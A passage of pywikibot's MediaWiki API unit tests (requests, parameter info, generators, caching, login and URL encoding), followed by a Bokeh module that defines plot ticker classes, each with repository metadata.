prefix = kwargs['site'].scriptpath() + '/api.php?'
self.assertEqual(prefix, parameters[:len(prefix)])
parameters = parameters[len(prefix):]
else:
parameters = kwargs['body']
parameters = parameters.encode('ascii') # it should be bytes anyway
# Extract parameter data from the body, it's ugly but allows us
# to verify that we actually test the right request
parameters = [p.split(b'=', 1) for p in parameters.split(b'&')]
keys = [p[0].decode('ascii') for p in parameters]
values = [unquote_to_bytes(p[1]) for p in parameters]
values = [v.decode(kwargs['site'].encoding()) for v in values]
values = [v.replace('+', ' ') for v in values]
values = [set(v.split('|')) for v in values]
parameters = dict(zip(keys, values))
if 'fake' not in parameters:
return False # do an actual request
if self.assert_parameters:
for param, value in self.assert_parameters.items():
self.assertIn(param, parameters)
if value is not None:
if isinstance(value, UnicodeType):
value = value.split('|')
self.assertLessEqual(set(value), parameters[param])
return self.data
def test_API_error(self):
"""Test a static request."""
req = api.Request(site=self.site, parameters={'action': 'query',
'fake': True})
with PatchedHttp(api, self.data):
self.assertRaises(api.APIMWException, req.submit)
def test_API_error_encoding_ASCII(self):
"""Test a Page instance as parameter using ASCII chars."""
page = pywikibot.page.Page(self.site, 'ASCII')
req = api.Request(site=self.site, parameters={'action': 'query',
'fake': True,
'titles': page})
self.assert_parameters = {'fake': ''}
with PatchedHttp(api, self._dummy_request):
self.assertRaises(api.APIMWException, req.submit)
def test_API_error_encoding_Unicode(self):
"""Test a Page instance as parameter using non-ASCII chars."""
page = pywikibot.page.Page(self.site, 'Ümlä üt')
req = api.Request(site=self.site, parameters={'action': 'query',
'fake': True,
'titles': page})
self.assert_parameters = {'fake': ''}
with PatchedHttp(api, self._dummy_request):
self.assertRaises(api.APIMWException, req.submit)
class TestApiFunctions(DefaultSiteTestCase):
"""API Request object test class."""
def testObjectCreation(self):
"""Test api.Request() constructor with implicit site creation."""
req = api.Request(parameters={'action': 'test', 'foo': '',
'bar': 'test'})
self.assertTrue(req)
self.assertEqual(req.site, self.get_site())
class TestDryApiFunctions(DefaultDrySiteTestCase):
"""API Request object test class."""
def testObjectCreation(self):
"""Test api.Request() constructor."""
mysite = self.get_site()
req = api.Request(site=mysite, parameters={'action': 'test', 'foo': '',
'bar': 'test'})
self.assertTrue(req)
self.assertEqual(req.site, mysite)
self.assertIn("foo", req._params)
self.assertEqual(req["bar"], ["test"])
# test item assignment
req["one"] = "1"
self.assertEqual(req._params['one'], ["1"])
# test compliance with dict interface
# req.keys() should contain "action", "foo", "bar", "one"
self.assertEqual(len(req.keys()), 4)
self.assertIn("test", req._encoded_items().values())
for item in req.items():
self.assertEqual(len(item), 2, item)
def test_mixed_mode(self):
"""Test if parameters is used with kwargs."""
req1 = api.Request(site=self.site, action='test', parameters='foo')
self.assertIn('parameters', req1._params)
req2 = api.Request(site=self.site, parameters={'action': 'test',
'parameters': 'foo'})
self.assertEqual(req2['parameters'], ['foo'])
self.assertEqual(req1._params, req2._params)
class TestParamInfo(DefaultSiteTestCase):
"""Test ParamInfo."""
def test_init(self):
"""Test common initialization."""
site = self.get_site()
pi = api.ParamInfo(site)
self.assertEqual(len(pi), 0)
pi._init()
self.assertIn('main', pi._paraminfo)
self.assertIn('paraminfo', pi._paraminfo)
if MediaWikiVersion(self.site.version()) >= MediaWikiVersion("1.12"):
self.assertEqual(len(pi),
len(pi.preloaded_modules))
self.assertIn('info', pi.query_modules)
self.assertIn('login', pi._action_modules)
def test_init_query_first(self):
"""Test init where it first adds query and then main."""
def patched_generate_submodules(modules):
# Change the query such that query is handled before main
modules = set(modules)
if 'main' in modules:
assert 'query' in modules
modules.discard('main')
modules = list(modules) + ['main']
else:
assert 'query' not in modules
original_generate_submodules(modules)
pi = api.ParamInfo(self.site, set(['query', 'main']))
self.assertEqual(len(pi), 0)
original_generate_submodules = pi._generate_submodules
pi._generate_submodules = patched_generate_submodules
pi._init()
self.assertIn('main', pi._paraminfo)
self.assertIn('query', pi._paraminfo)
def test_init_pageset(self):
"""Test initializing with only the pageset."""
site = self.get_site()
self.assertNotIn('query', api.ParamInfo.init_modules)
pi = api.ParamInfo(site, set(['pageset']))
self.assertNotIn('query', api.ParamInfo.init_modules)
self.assertEqual(len(pi), 0)
pi._init()
self.assertIn('main', pi._paraminfo)
self.assertIn('paraminfo', pi._paraminfo)
self.assertIn('pageset', pi._paraminfo)
if MediaWikiVersion(self.site.version()) < MediaWikiVersion("1.12"):
return
if 'query' in pi.preloaded_modules:
self.assertIn('query', pi._paraminfo)
self.assertEqual(len(pi), 4)
else:
self.assertNotIn('query', pi._paraminfo)
self.assertEqual(len(pi), 3)
self.assertEqual(len(pi),
len(pi.preloaded_modules))
if MediaWikiVersion(site.version()) >= MediaWikiVersion("1.21"):
# 'generator' was added to 'pageset' in 1.21
generators_param = pi.parameter('pageset', 'generator')
self.assertGreater(len(generators_param['type']), 1)
def test_generators(self):
"""Test requesting the generator parameter."""
site = self.get_site()
pi = api.ParamInfo(site, set(['pageset', 'query']))
self.assertEqual(len(pi), 0)
pi._init()
self.assertIn('main', pi._paraminfo)
self.assertIn('paraminfo', pi._paraminfo)
self.assertIn('pageset', pi._paraminfo)
self.assertIn('query', pi._paraminfo)
if MediaWikiVersion(site.version()) >= MediaWikiVersion("1.21"):
# 'generator' was added to 'pageset' in 1.21
pageset_generators_param = pi.parameter('pageset', 'generator')
query_generators_param = pi.parameter('query', 'generator')
self.assertEqual(pageset_generators_param, query_generators_param)
def test_with_module_info(self):
"""Test requesting the module info."""
site = self.get_site()
pi = api.ParamInfo(site)
self.assertEqual(len(pi), 0)
pi.fetch(['info'])
self.assertIn('query+info', pi._paraminfo)
self.assertIn('main', pi._paraminfo)
self.assertIn('paraminfo', pi._paraminfo)
if MediaWikiVersion(self.site.version()) >= MediaWikiVersion("1.12"):
self.assertEqual(len(pi),
1 + len(pi.preloaded_modules))
self.assertEqual(pi['info']['prefix'], 'in')
param = pi.parameter('info', 'prop')
self.assertIsInstance(param, dict)
self.assertEqual(param['name'], 'prop')
self.assertNotIn('deprecated', param)
self.assertIsInstance(param['type'], list)
if MediaWikiVersion(self.site.version()) < MediaWikiVersion("1.12"):
return
self.assertIn('protection', param['type'])
def test_with_module_revisions(self):
"""Test requesting the module revisions."""
site = self.get_site()
pi = api.ParamInfo(site)
self.assertEqual(len(pi), 0)
pi.fetch(['revisions'])
self.assertIn('query+revisions', pi._paraminfo)
self.assertIn('main', pi._paraminfo)
self.assertIn('paraminfo', pi._paraminfo)
if MediaWikiVersion(self.site.version()) >= MediaWikiVersion("1.12"):
self.assertEqual(len(pi),
1 + len(pi.preloaded_modules))
self.assertEqual(pi['revisions']['prefix'], 'rv')
param = pi.parameter('revisions', 'prop')
self.assertIsInstance(param, dict)
self.assertEqual(param['name'], 'prop')
self.assertNotIn('deprecated', param)
self.assertIsInstance(param['type'], list)
if MediaWikiVersion(self.site.version()) < MediaWikiVersion("1.12"):
return
self.assertIn('user', param['type'])
def test_multiple_modules(self):
"""Test requesting multiple modules in one fetch."""
site = self.get_site()
pi = api.ParamInfo(site)
self.assertEqual(len(pi), 0)
pi.fetch(['info', 'revisions'])
self.assertIn('query+info', pi._paraminfo)
self.assertIn('query+revisions', pi._paraminfo)
self.assertIn('main', pi._paraminfo)
self.assertIn('paraminfo', pi._paraminfo)
if MediaWikiVersion(self.site.version()) < MediaWikiVersion("1.12"):
return
self.assertEqual(len(pi),
2 + len(pi.preloaded_modules))
def test_with_invalid_module(self):
"""Test requesting different kind of invalid modules."""
site = self.get_site()
pi = api.ParamInfo(site)
self.assertEqual(len(pi), 0)
pi.fetch('foobar')
self.assertNotIn('foobar', pi._paraminfo)
self.assertRaises(KeyError, pi.__getitem__, 'foobar')
self.assertRaises(KeyError, pi.__getitem__, 'foobar+foobar')
self.assertIn('main', pi._paraminfo)
self.assertIn('paraminfo', pi._paraminfo)
if MediaWikiVersion(self.site.version()) < MediaWikiVersion("1.12"):
return
self.assertEqual(len(pi),
len(pi.preloaded_modules))
def test_submodules(self):
"""Test another module apart from query having submodules."""
pi = api.ParamInfo(self.site)
self.assertFalse(pi._modules)
pi.fetch(['query'])
self.assertIn('query', pi._modules)
self.assertIsInstance(pi._modules['query'], frozenset)
self.assertIn('revisions', pi._modules['query'])
self.assertEqual(pi.submodules('query'), pi.query_modules)
for mod in pi.submodules('query', True):
self.assertEqual(mod[:6], 'query+')
self.assertEqual(mod[6:], pi[mod]['name'])
self.assertEqual(mod, pi[mod]['path'])
self.assertRaises(KeyError, pi.__getitem__, 'query+foobar')
self.assertRaises(KeyError, pi.submodules, 'edit')
def test_query_modules_with_limits(self):
"""Test query_modules_with_limits property."""
site = self.get_site()
pi = api.ParamInfo(site)
self.assertIn('revisions', pi.query_modules_with_limits)
self.assertNotIn('info', pi.query_modules_with_limits)
def test_modules(self):
"""Test v1.8 modules exist."""
site = self.get_site()
pi = api.ParamInfo(site)
self.assertIn('revisions', pi.modules)
self.assertIn('help', pi.modules)
self.assertIn('allpages', pi.modules)
for mod in pi.modules:
self.assertNotIn('+', mod)
def test_module_paths(self):
"""Test module paths use the complete paths."""
pi = api.ParamInfo(self.site)
self.assertIn('help', pi.module_paths)
self.assertNotIn('revisions', pi.module_paths)
self.assertIn('query+revisions', pi.module_paths)
self.assertNotIn('allpages', pi.module_paths)
self.assertIn('query+allpages', pi.module_paths)
def test_prefixes(self):
"""Test v1.8 module prefixes exist."""
site = self.get_site()
pi = api.ParamInfo(site)
self.assertIn('revisions', pi.prefixes)
self.assertIn('login', pi.prefixes)
self.assertIn('allpages', pi.prefixes)
def test_prefix_map(self):
"""Test module prefixes use the path."""
pi = api.ParamInfo(self.site)
self.assertIn('query+revisions', pi.prefix_map)
self.assertIn('login', pi.prefix_map)
self.assertIn('query+allpages', pi.prefix_map)
for mod in pi.prefix_map:
self.assertEqual(mod, pi[mod]['path'])
def test_attributes(self):
"""Test attributes method."""
pi = api.ParamInfo(self.site)
attributes = pi.attributes('mustbeposted')
self.assertIn('edit', attributes)
for mod, value in attributes.items():
self.assertEqual(mod, pi[mod]['path'])
self.assertEqual(value, '')
def test_old_mode(self):
"""Test the old mode explicitly."""
site = self.get_site()
pi = api.ParamInfo(site, modules_only_mode=False)
pi.fetch(['info'])
self.assertIn('query+info', pi._paraminfo)
self.assertIn('main', pi._paraminfo)
self.assertIn('paraminfo', pi._paraminfo)
if MediaWikiVersion(self.site.version()) >= MediaWikiVersion("1.12"):
self.assertEqual(len(pi),
1 + len(pi.preloaded_modules))
self.assertIn('revisions', pi.prefixes)
def test_new_mode(self):
"""Test the new modules-only mode explicitly."""
site = self.get_site()
if MediaWikiVersion(site.version()) < MediaWikiVersion('1.25wmf4'):
raise unittest.SkipTest(
"version %s doesn't support the new paraminfo api"
% site.version())
pi = api.ParamInfo(site, modules_only_mode=True)
pi.fetch(['info'])
self.assertIn('query+info', pi._paraminfo)
self.assertIn('main', pi._paraminfo)
self.assertIn('paraminfo', pi._paraminfo)
self.assertEqual(len(pi),
1 + len(pi.preloaded_modules))
self.assertIn('revisions', pi.prefixes)
class TestOtherSubmodule(TestCase):
"""Test handling multiple different modules having submodules."""
family = 'mediawiki'
code = 'mediawiki'
def test_other_submodule(self):
"""Test another module apart from query having submodules."""
pi = api.ParamInfo(self.site)
self.assertFalse(pi._modules)
pi.fetch(['query'])
self.assertNotIn('flow', pi._modules)
pi.fetch(['flow'])
self.assertIn('flow', pi._modules)
other_modules = set()
for modules in pi._modules.values():
self.assertIsInstance(modules, frozenset)
other_modules |= modules
other_modules -= pi.action_modules
other_modules -= pi.query_modules
self.assertLessEqual(other_modules & pi.submodules('flow'),
pi.submodules('flow'))
self.assertFalse(other_modules & pi.modules)
class TestParaminfoModules(DefaultSiteTestCase):
"""Test loading all paraminfo modules."""
def test_action_modules(self):
"""Test loading all action modules."""
self.site._paraminfo.fetch(self.site._paraminfo.action_modules)
def test_query_modules(self):
"""Test loading all query modules."""
self.site._paraminfo.fetch(self.site._paraminfo.query_modules)
class TestOptionSet(TestCase):
"""OptionSet class test class."""
family = 'wikipedia'
code = 'en'
def test_non_lazy_load(self):
"""Test OptionSet with initialised site."""
options = api.OptionSet(self.get_site(), 'recentchanges', 'show')
self.assertRaises(KeyError, options.__setitem__, 'invalid_name', True)
self.assertRaises(ValueError, options.__setitem__, 'anon', 'invalid_value')
options['anon'] = True
self.assertCountEqual(['anon'], options._enabled)
self.assertEqual(set(), options._disabled)
self.assertEqual(1, len(options))
self.assertEqual(['anon'], list(options))
self.assertEqual(['anon'], list(options.api_iter()))
options['bot'] = False
self.assertCountEqual(['anon'], options._enabled)
self.assertCountEqual(['bot'], options._disabled)
self.assertEqual(2, len(options))
self.assertEqual(['anon', 'bot'], list(options))
self.assertEqual(['anon', '!bot'], list(options.api_iter()))
options.clear()
self.assertEqual(set(), options._enabled)
self.assertEqual(set(), options._disabled)
self.assertEqual(0, len(options))
self.assertEqual([], list(options))
self.assertEqual([], list(options.api_iter()))
def test_lazy_load(self):
"""Test OptionSet with delayed site initialisation."""
options = api.OptionSet()
options['invalid_name'] = True
options['anon'] = True
self.assertIn('invalid_name', options._enabled)
self.assertEqual(2, len(options))
self.assertRaises(KeyError, options._set_site, self.get_site(),
'recentchanges', 'show')
self.assertEqual(2, len(options))
options._set_site(self.get_site(), 'recentchanges', 'show', True)
self.assertEqual(1, len(options))
self.assertRaises(TypeError, options._set_site, self.get_site(),
'recentchanges', 'show')
class TestDryOptionSet(DefaultDrySiteTestCase):
"""OptionSet class test class."""
def test_mutable_mapping(self):
"""Test keys, values and items from MutableMapping."""
options = api.OptionSet()
options['a'] = True
options['b'] = False
options['c'] = None
self.assertCountEqual(['a', 'b'], list(options.keys()))
self.assertCountEqual([True, False], list(options.values()))
self.assertEqual(set(), set(options.values()) - set([True, False]))
self.assertCountEqual([('a', True), ('b', False)], list(options.items()))
class TestDryPageGenerator(TestCase):
"""Dry API PageGenerator object test class."""
family = 'wikipedia'
code = 'en'
dry = True
# api.py sorts 'pages' using the string key, which is not a
# numeric comparison.
titles = ("Broadcaster (definition)", "Wiktionary", "Broadcaster.com",
"Wikipedia:Disambiguation")
def setUp(self):
"""Set up test case."""
super(TestDryPageGenerator, self).setUp()
mysite = self.get_site()
self.gen = api.PageGenerator(site=mysite,
generator="links",
titles="User:R'n'B")
# following test data is copied from an actual api.php response,
# but that query no longer matches this dataset.
# http://en.wikipedia.org/w/api.php?action=query&generator=links&titles=User:R%27n%27B
self.gen.request.submit = types.MethodType(lambda self: {
"query": {"pages": {"296589": {"pageid": 296589,
"ns": 0,
"title": "Broadcaster.com"
},
"13918157": {"pageid": 13918157,
"ns": 0,
"title": "Broadcaster (definition)"
},
"156658": {"pageid": 156658,
"ns": 0,
"title": "Wiktionary"
},
"47757": {"pageid": 47757,
"ns": 4,
"title": "Wikipedia:Disambiguation"
}
}
}
}, self.gen.request)
# On a dry site, the namespace objects only have canonical names.
# Add custom_name for this site namespace, to match the live site.
if 'Wikipedia' not in self.site.namespaces:
self.site.namespaces[4].custom_name = 'Wikipedia'
self.site.namespaces._namespace_names['wikipedia'] = self.site.namespaces[4]
def test_results(self):
"""Test that PageGenerator yields pages with expected attributes."""
self.assertPagelistTitles(self.gen, self.titles)
def test_initial_limit(self):
"""Test the default limit."""
self.assertEqual(self.gen.limit, None) # limit is initally None
def test_set_limit_as_number(self):
"""Test setting the limit using an int."""
for i in range(-2, 4):
self.gen.set_maximum_items(i)
self.assertEqual(self.gen.limit, i)
def test_set_limit_as_string(self):
"""Test setting the limit using an int cast into a string."""
for i in range(-2, 4):
self.gen.set_maximum_items(str(i))
self.assertEqual(self.gen.limit, i)
def test_set_limit_not_number(self):
"""Test setting the limit to not a number."""
with self.assertRaisesRegex(
ValueError,
"invalid literal for int\(\) with base 10: 'test'"):
self.gen.set_maximum_items('test')
def test_limit_equal_total(self):
"""Test that PageGenerator yields the requested amount of pages."""
self.gen.set_maximum_items(4)
self.assertPagelistTitles(self.gen, self.titles)
def test_limit_one(self):
"""Test that PageGenerator yields the requested amount of pages."""
self.gen.set_maximum_items(1)
self.assertPagelistTitles(self.gen, self.titles[0:1])
def test_limit_zero(self):
"""Test that a limit of zero is the same as limit None."""
self.gen.set_maximum_items(0)
self.assertPagelistTitles(self.gen, self.titles)
def test_limit_omit(self):
"""Test that limit omitted is the same as limit None."""
self.gen.set_maximum_items(-1)
self.assertPagelistTitles(self.gen, self.titles)
def test_namespace(self):
"""Test PageGenerator set_namespace."""
self.assertRaises(AssertionError, self.gen.set_namespace, 0)
self.assertRaises(AssertionError, self.gen.set_namespace, 1)
self.assertRaises(AssertionError, self.gen.set_namespace, None)
class TestPropertyGenerator(TestCase):
"""API PropertyGenerator object test class."""
family = 'wikipedia'
code = 'en'
def test_info(self):
"""Test PropertyGenerator with prop 'info'."""
mainpage = self.get_mainpage()
links = list(self.site.pagelinks(mainpage, total=10))
titles = [l.title(withSection=False)
for l in links]
gen = api.PropertyGenerator(site=self.site,
prop="info",
titles='|'.join(titles))
count = 0
for pagedata in gen:
self.assertIsInstance(pagedata, dict)
self.assertIn('pageid', pagedata)
self.assertIn('lastrevid', pagedata)
count += 1
self.assertEqual(len(links), count)
def test_one_continuation(self):
"""Test PropertyGenerator with prop 'revisions'."""
mainpage = self.get_mainpage()
links = list(self.site.pagelinks(mainpage, total=10))
titles = [l.title(withSection=False)
for l in links]
gen = api.PropertyGenerator(site=self.site,
prop="revisions",
titles='|'.join(titles))
gen.set_maximum_items(-1) # suppress use of "rvlimit" parameter
count = 0
for pagedata in gen:
self.assertIsInstance(pagedata, dict)
self.assertIn('pageid', pagedata)
self.assertIn('revisions', pagedata)
self.assertIn('revid', pagedata['revisions'][0])
count += 1
self.assertEqual(len(links), count)
def test_two_continuations(self):
"""Test PropertyGenerator with prop 'revisions' and 'coordinates'."""
mainpage = self.get_mainpage()
links = list(self.site.pagelinks(mainpage, total=10))
titles = [l.title(withSection=False)
for l in links]
gen = api.PropertyGenerator(site=self.site,
prop="revisions|coordinates",
titles='|'.join(titles))
gen.set_maximum_items(-1) # suppress use of "rvlimit" parameter
count = 0
for pagedata in gen:
self.assertIsInstance(pagedata, dict)
self.assertIn('pageid', pagedata)
self.assertIn('revisions', pagedata)
self.assertIn('revid', pagedata['revisions'][0])
count += 1
self.assertEqual(len(links), count)
@allowed_failure
def test_many_continuations_limited(self):
"""Test PropertyGenerator with many limited props."""
mainpage = self.get_mainpage()
links = list(self.site.pagelinks(mainpage, total=30))
titles = [l.title(withSection=False)
for l in links]
gen = api.PropertyGenerator(site=self.site,
prop="revisions|info|categoryinfo|langlinks|templates",
rvprop="ids|flags|timestamp|user|comment|content",
titles='|'.join(titles))
# An APIError is raised if set_maximum_items is not called.
gen.set_maximum_items(-1) # suppress use of "rvlimit" parameter
# Force the generator into continuation mode
gen.set_query_increment(5)
count = 0
for pagedata in gen:
self.assertIsInstance(pagedata, dict)
self.assertIn('pageid', pagedata)
count += 1
self.assertEqual(len(links), count)
# FIXME: AssertionError: 30 != 6150
@allowed_failure
def test_two_continuations_limited(self):
"""Test PropertyGenerator with many limited props and continuations."""
# FIXME: test fails
mainpage = self.get_mainpage()
links = list(self.site.pagelinks(mainpage, total=30))
titles = [l.title(withSection=False)
for l in links]
gen = api.PropertyGenerator(site=self.site,
prop="info|categoryinfo|langlinks|templates",
titles='|'.join(titles))
# Force the generator into continuation mode
gen.set_query_increment(5)
count = 0
for pagedata in gen:
self.assertIsInstance(pagedata, dict)
self.assertIn('pageid', pagedata)
count += 1
self.assertEqual(len(links), count)
# FIXME: AssertionError: 30 != 11550
# FIXME: test disabled as it takes longer than 10 minutes
def _test_two_continuations_limited_long_test(self):
"""Long duration test, with total & step that are a real scenario."""
mainpage = self.get_mainpage()
links = list(mainpage.backlinks(total=300))
titles = [l.title(withSection=False)
for l in links]
gen = api.PropertyGenerator(site=self.site,
prop="info|categoryinfo|langlinks|templates",
titles='|'.join(titles))
# Force the generator into continuation mode
gen.set_query_increment(50)
count = 0
for pagedata in gen:
self.assertIsInstance(pagedata, dict)
self.assertIn('pageid', pagedata)
count += 1
self.assertEqual(len(links), count)
class TestDryListGenerator(TestCase):
"""Test ListGenerator."""
family = 'wikipedia'
code = 'en'
dry = True
def setUp(self):
"""Set up test case."""
super(TestDryListGenerator, self).setUp()
mysite = self.get_site()
mysite._paraminfo['query+allpages'] = {
'prefix': 'ap',
'limit': {'max': 10},
'namespace': {'multi': True}
}
mysite._paraminfo.query_modules_with_limits = set(['allpages'])
self.gen = api.ListGenerator(listaction="allpages", site=mysite)
def test_namespace_none(self):
"""Test ListGenerator set_namespace with None."""
self.assertRaises(TypeError, self.gen.set_namespace, None)
def test_namespace_zero(self):
"""Test ListGenerator set_namespace with 0."""
self.gen.set_namespace(0)
class TestCachedRequest(DefaultSiteTestCase):
"""Test API Request caching.
This test class does not use the forced test caching.
"""
cached = False
def test_normal_use(self):
"""Test the caching of CachedRequest with an ordinary request."""
mysite = self.get_site()
mainpage = self.get_mainpage()
# Run the cached query three times to ensure the
# data returned is equal, and the last two have
# the same cache time.
params = {'action': 'query',
'prop': 'info',
'titles': mainpage.title(),
}
req1 = api.CachedRequest(datetime.timedelta(minutes=10),
site=mysite, parameters=params)
data1 = req1.submit()
req2 = api.CachedRequest(datetime.timedelta(minutes=10),
site=mysite, parameters=params)
data2 = req2.submit()
req3 = api.CachedRequest(datetime.timedelta(minutes=10),
site=mysite, parameters=params)
data3 = req3.submit()
self.assertEqual(data1, data2)
self.assertEqual(data2, data3)
self.assertIsNotNone(req2._cachetime)
self.assertIsNotNone(req3._cachetime)
self.assertEqual(req2._cachetime, req3._cachetime)
def test_internals(self):
"""Test the caching of CachedRequest by faking a unique request."""
mysite = self.get_site()
# Run tests on a missing page unique to this test run so it can
# not be cached the first request, but will be cached after.
now = datetime.datetime.now()
params = {'action': 'query',
'prop': 'info',
'titles': 'TestCachedRequest_test_internals ' + str(now),
}
req = api.CachedRequest(datetime.timedelta(minutes=10),
site=mysite, parameters=params)
rv = req._load_cache()
self.assertFalse(rv)
self.assertIsNone(req._data)
self.assertIsNone(req._cachetime)
data = req.submit()
self.assertIsNotNone(req._data)
self.assertIsNone(req._cachetime)
rv = req._load_cache()
self.assertTrue(rv)
self.assertIsNotNone(req._data)
self.assertIsNotNone(req._cachetime)
self.assertGreater(req._cachetime, now)
self.assertEqual(req._data, data)
class TestLazyLoginBase(TestCase):
"""
Test that it tries to login when read API access is denied.
Because there is no such family configured it creates an AutoFamily and
BaseSite on it's own. It's testing against steward.wikimedia.org.
These tests are split into two subclasses as only the first failed login
behaves as expected. All subsequent logins will raise an APIError, making
it impossible to test two scenarios with the same APISite object.
"""
hostname = 'steward.wikimedia.org'
@classmethod
def setUpClass(cls):
"""Set up steward Family."""
super(TestLazyLoginBase, cls).setUpClass()
fam = pywikibot.family.AutoFamily(
'steward', 'https://steward.wikimedia.org/w/api.php')
cls.site = pywikibot.site.APISite('steward', fam)
class TestLazyLoginNotExistUsername(TestLazyLoginBase):
"""Test missing username."""
# FIXME: due to limitations of LoginManager, it will ask the user
# for a password even if the username does not exist, and even if
# pywikibot is not connected to a tty. T100964
def setUp(self):
"""Patch the LoginManager to avoid UI interaction."""
super(TestLazyLoginNotExistUsername, self).setUp()
self.orig_login_manager = pywikibot.data.api.LoginManager
pywikibot.data.api.LoginManager = FakeLoginManager
def tearDown(self):
"""Restore the original LoginManager."""
pywikibot.data.api.LoginManager = self.orig_login_manager
super(TestLazyLoginNotExistUsername, self).tearDown()
def test_access_denied_notexist_username(self):
"""Test the query with a username which does not exist."""
self.site._username = ['Not registered username', None]
req = api.Request(site=self.site, parameters={'action': 'query'})
self.assertRaises(pywikibot.NoUsername, req.submit)
# FIXME: T100965
self.assertRaises(api.APIError, req.submit)
class TestLazyLoginNoUsername(TestLazyLoginBase):
"""Test no username."""
def test_access_denied_no_username(self):
"""Test the query without a username."""
self.site._username = [None, None]
# FIXME: The following prevents LoginManager
# from loading the username from the config when the site
# username is None. i.e. site.login(user=None) means load
# username from the configuration.
if 'steward' in pywikibot.config.usernames:
del pywikibot.config.usernames['steward']
req = api.Request(site=self.site, parameters={'action': 'query'})
self.assertRaises(pywikibot.NoUsername, req.submit)
# FIXME: T100965
self.assertRaises(api.APIError, req.submit)
class TestBadTokenRecovery(TestCase):
"""Test that the request recovers from bad tokens."""
family = 'wikipedia'
code = 'test'
write = True
def test_bad_token(self):
"""Test the bad token recovery by corrupting the cache."""
site = self.get_site()
site.tokens._tokens.setdefault(site.user(), {})['edit'] = 'INVALID'
page = pywikibot.Page(site, 'Pywikibot bad token test')
page.text = ('This page is testing whether pywikibot-core rerequests '
'a token when a badtoken error was received.')
page.save(summary='Bad token test')
class TestUrlEncoding(TestCase):
"""Test encode_url() function."""
net = False
def test_url_encoding_from_list(self):
"""Test moving 'token' parameters from a list to the end."""
query = [('action', 'edit'), ('token', 'a'), ('supertoken', 'b'),
('text', 'text')]
expect = 'action=edit&text=text&token=a&supertoken=b'
result = api.encode_url(query)
self.assertEqual(result, expect)
self.assertIsInstance(result, str)
def test_url_encoding_from_dict(self):
"""Test moving 'token' parameters from a dict to the end."""
# do not add other keys because dictionary is not deterministic
query = {'supertoken': 'b', 'text': 'text'}
expect = 'text=text&supertoken=b'
result = api.encode_url(query)
self.assertEqual(result, expect)
self.assertIsInstance(result, str)
def test_url_encoding_from_unicode(self):
"""Test encoding unicode values."""
query = {'token': 'токен'}
expect = 'token=%D1%82%D0%BE%D0%BA%D0%B5%D0%BD'
result = api.encode_url(query)
self.assertEqual(result, expect)
self.assertIsInstance(result, str)
def test_url_encoding_from_basestring(self):
"""Test encoding basestring values."""
if PY2:
query = {'token': str('test\xe2\x80\x94test'.encode('utf-8'))}
else:
query = {'token': 'test\xe2\x80\x94test'}
expect = str('token=test%C3%A2%C2%80%C2%94test')
result = api.encode_url(query)
self.assertEqual(result, expect)
self.assertIsInstance(result, str)
def test_moving_special_tokens(self):
"""Test moving wpEditToken to the very end."""
query = {'wpEditToken': 'c', 'token': 'b', 'text': 'a'}
expect = 'text=a&token=b&wpEditToken=c'
result = api.encode_url(query)
self.assertEqual(result, expect)
self.assertIsInstance(result, str)
if __name__ == '__main__':
try:
unittest.main()
except SystemExit:
pass
| {
"content_hash": "a6dd54812f0a6e97ad1495e9fecaa919",
"timestamp": "",
"source": "github",
"line_count": 1032,
"max_line_length": 94,
"avg_line_length": 37.87112403100775,
"alnum_prop": 0.584397308292608,
"repo_name": "h4ck3rm1k3/pywikibot-core",
"id": "3e3e61a0b873ca4b868279eda88feba95c52914b",
"size": "39116",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/api_tests.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "97"
},
{
"name": "Python",
"bytes": "4210758"
},
{
"name": "Shell",
"bytes": "659"
}
],
"symlink_target": ""
} |
""" Models for computing good tick locations on different kinds
of plots.
"""
from __future__ import absolute_import
from ..plot_object import PlotObject
from ..properties import abstract
from ..properties import Int, Float, Seq, Instance
@abstract
class Ticker(PlotObject):
""" A base class for all ticker types. ``Ticker`` is
not generally useful to instantiate on its own.
"""
num_minor_ticks = Int(5, help="""
The number of minor tick positions to generate between
adjacent major tick values.
""")
desired_num_ticks = Int(6, help="""
A desired target number of major tick positions to generate across
the plot range.
.. note:
This value is a suggestion, and ticker subclasses may ignore
it entirely, or use it only as an ideal goal to approach as well
as can be, in the context of a specific ticking strategy.
""")
class FixedTicker(Ticker):
""" Generate ticks at fixed, explicitly supplied locations.
.. note::
The ``desired_num_ticks`` property is ignored by this Ticker.
"""
ticks = Seq(Float, help="""
List of tick locations.
""")
class AdaptiveTicker(Ticker):
""" Generate "nice" round ticks at any magnitude.
Creates ticks that are "base" multiples of a set of given
mantissas. For example, with ``base=10`` and
``mantissas=[1, 2, 5]``, the ticker will generate the sequence::
..., 0.1, 0.2, 0.5, 1, 2, 5, 10, 20, 50, 100, ...
"""
base = Float(10.0, help="""
The multiplier to use for scaling mantissas.
""")
mantissas = Seq(Float, [2, 5, 10], help="""
The acceptable list numbers to generate multiples of.
""")
min_interval = Float(0.0, help="""
The smallest allowable interval between two adjacent ticks.
""")
max_interval = Float(float('Inf'), help="""
The largest allowable interval between two adjacent ticks.
""")
class CompositeTicker(Ticker):
""" Combine different tickers at different scales.
Uses the ``min_interval`` and ``max_interval`` interval attributes
of the tickers to select the appropriate ticker at different
scales.
"""
tickers = Seq(Instance(Ticker), help="""
A list of Ticker objects to combine at different scales in order
to generate tick values. The supplied tickers should be in order.
Specifically, if S comes before T, then it should be the case that::
S.get_max_interval() < T.get_min_interval()
""")
class SingleIntervalTicker(Ticker):
""" Generate evenly spaced ticks at a fixed interval regardless of
scale.
"""
interval = Float(help="""
The interval between adjacent ticks.
""")
class DaysTicker(SingleIntervalTicker):
""" Generate ticks spaced apart by specific, even multiples of days.
"""
days = Seq(Int, help="""
The intervals of days to use.
""")
class MonthsTicker(SingleIntervalTicker):
""" Generate ticks spaced apart by specific, even multiples of months.
"""
months = Seq(Int, help="""
The intervals of months to use.
""")
class YearsTicker(SingleIntervalTicker):
""" Generate ticks spaced apart even numbers of years.
"""
class BasicTicker(AdaptiveTicker):
""" Generate ticks on a linear scale.
.. note::
This class may be renamed to ``LinearTicker`` in the future.
"""
class LogTicker(AdaptiveTicker):
""" Generate ticks on a log scale.
"""
class CategoricalTicker(Ticker):
""" Generate ticks for categorical ranges.
"""
class DatetimeTicker(Ticker):
""" Generate nice ticks across different date and time scales.
"""
| {
"content_hash": "4e2436a0f147d63122743da008e1f5be",
"timestamp": "",
"source": "github",
"line_count": 143,
"max_line_length": 74,
"avg_line_length": 25.615384615384617,
"alnum_prop": 0.6562926562926563,
"repo_name": "gpfreitas/bokeh",
